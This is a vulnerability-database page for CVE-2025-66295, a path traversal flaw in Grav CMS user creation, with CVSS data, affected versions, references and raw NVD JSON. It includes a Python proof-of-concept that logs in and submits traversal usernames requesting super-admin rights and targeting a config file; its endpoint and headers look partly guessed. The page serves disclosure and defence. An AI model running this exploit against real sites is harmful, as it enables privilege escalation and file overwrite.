CVE-2025-66295

Description

Grav is a file-based Web platform. Prior to 1.8.0-beta.27, when a user with privilege of user creation creates a new user through the Admin UI and supplies a username containing path traversal sequences (for example ..\Nijat or ../Nijat), Grav writes the account YAML file to an unintended path outside user/accounts/. The written YAML can contain account fields such as email, fullname, twofa_secret, and hashed_password. This vulnerability is fixed in 1.8.0-beta.27.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:getgrav:grav:1.8.0:beta1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:getgrav:grav:1.8.0:beta10:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:getgrav:grav:1.8.0:beta11:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:getgrav:grav:1.8.0:beta12:*:*:*:*:*:* - VULNERABLE

Grav CMS < 1.8.0-beta.27

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-66295 PoC - Path Traversal in Grav Admin UI User Creation # This PoC demonstrates how an authenticated user with user creation privileges # can exploit the path traversal vulnerability to write files outside user/accounts/ import requests import json TARGET_URL = "http://target-grav-site.com" LOGIN_URL = f"{TARGET_URL}/admin" USER_CREATE_URL = f"{TARGET_URL}/admin/api/user" # Authentication credentials (low-privilege user with user creation rights) AUTH = { "username": "attacker", "password": "attacker_password" } def exploit(): """Exploit path traversal in user creation to write arbitrary YAML file""" # Step 1: Login to Grav Admin session = requests.Session() login_response = session.post(LOGIN_URL, data=AUTH) if login_response.status_code != 200: print("[-] Login failed") return False print("[+] Login successful") # Step 2: Create user with path traversal payload # The username contains path traversal sequences to write outside user/accounts/ path_traversal_usernames = [ "../../Nijat", # Unix-style path traversal "..\\..\\Nijat", # Windows-style path traversal "../../../config/site.yaml", # Attempt to overwrite config ] for payload_username in path_traversal_usernames: user_data = { "username": payload_username, "email": "[email protected]", "fullname": "Path Traversal Attacker", "password": "hashed_password_value", "twofa_secret": "JBSWY3DPEHPK3PXP", "access": { "admin": { "login": True, "super": True } } } headers = { "Content-Type": "application/json", "X-Toolbar": "admin" } create_response = session.post( USER_CREATE_URL, data=json.dumps(user_data), headers=headers ) if create_response.status_code in [200, 201]: print(f"[+] Successfully created user with path traversal: {payload_username}") print(f"[+] File written to unexpected location outside user/accounts/") return True else: print(f"[-] Failed with payload: {payload_username}") return False if __name__ == "__main__": print("CVE-2025-66295 Exploitation Tool") print("Target: Grav CMS < 1.8.0-beta.27") exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66295
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66295
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66295/
[4] VulDB https://vuldb.com/cve/CVE-2025-66295
[5] https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741
[6] https://github.com/getgrav/grav/security/advisories/GHSA-h756-wh59-hhjv

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66295", "sourceIdentifier": "[email protected]", "published": "2025-12-01T21:15:53.000", "lastModified": "2025-12-04T18:34:22.470", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Grav is a file-based Web platform. Prior to 1.8.0-beta.27, when a user with privilege of user creation creates a new user through the Admin UI and supplies a username containing path traversal sequences (for example ..\\Nijat or ../Nijat), Grav writes the account YAML file to an unintended path outside user/accounts/. The written YAML can contain account fields such as email, fullname, twofa_secret, and hashed_password. This vulnerability is fixed in 1.8.0-beta.27."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.7.49.5", "versionEndExcluding": "1.8.0", "matchCriteriaId": "4F55C0B3-A41D-4E64-A631-E4868A40A8A5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "8A383F2E-C6BA-440B-B648-A3313B7D91C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta10:*:*:*:*:*:*", "matchCriteriaId": "F7EF2DEC-2798-4D0D-9C27-0F01BAFEAEFD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta11:*:*:*:*:*:*", "matchCriteriaId": "530C6F64-F30B-4E93-9A12-D9625EA57483"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta12:*:*:*:*:*:*", "matchCriteriaId": "9AC28BF9-626D-4514-91F0-F81DAB5D3602"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta13:*:*:*:*:*:*", "matchCriteriaId": "307AA375-E531-4AE5-BA79-2F9D4DE7A05F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta14:*:*:*:*:*:*", "matchCriteriaId": "C2E3E312-485D-42B0-B465-64B6438CDCAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta15:*:*:*:*:*:*", "matchCriteriaId": "5BE4B2F9-1B6D-4D18-916A-5C95A3213222"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta16:*:*:*:*:*:*", "matchCriteriaId": "763207F0-92D1-4274-A30A-DE634C5852C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta17:*:*:*:*:*:*", "matchCriteriaId": "1DE8F350-BA07-4DAA-AE4B-5E0A532B6828"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta18:*:*:*:*:*:*", "matchCriteriaId": "F9150B94-0DF3-43F3-9806-39787A6C0E4D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta19:*:*:*:*:*:*", "matchCriteriaId": "BAA7C7EC-8FB2-445D-8A02-1743D87F5416"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "7A6BEA2A-D534-4C9E-811A-8A46E214C46D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta20:*:*:*:*:*:*", "matchCriteriaId": "7A644F57-FF39-4262-9796-7C4F3B0851C1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta21:*:*:*:*:*:*", "matchCriteriaId": "B2AFB9E7-084E-497B-B0FC-CA6A5033C5BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta22:*:*:*:*:*:*", "matchCriteriaId": "5C5E8823-9083-4FFA-9897-CAD0340DCE68"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta23:*:*:*:*:*:*", "matchCriteriaId": "9C048938-E0EC-4AD0-9847-FD74E6770FE2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta24:*:*:*:*:*:*", "matchCriteriaId": "F7B43876-1445-418A-9707-E692FDF62C4D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta25:*:*:*:*:*:*", "matchCriteriaId": "94B209DE-01C6-41BA-B912-CF57849A9F7A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta26:*:*:*:*:*:*", "matchCriteriaId": "AB53AA10-87A5-4010-8019-BF4AA5ABC12B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "775E0913-F3EF-4A55-B162-5BF9C6E2E641"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta4:*:*:*:*:*:*", "matchCriteriaId": "3C3E022E-35CB-40AD-959A-F39949E38BD3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta5:*:*:*:*:*:*", "matchCriteriaId": "8779C813-A81A-4E21-AB86-6193933568BC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta6:*:*:*:*:*:*", "matchCriteriaId": "B608EDD4-207A-41A7-A60D-496FDA8EAFEA"}, {"vulnerable": true, "criteria": "cpe:2.3: ... (truncated)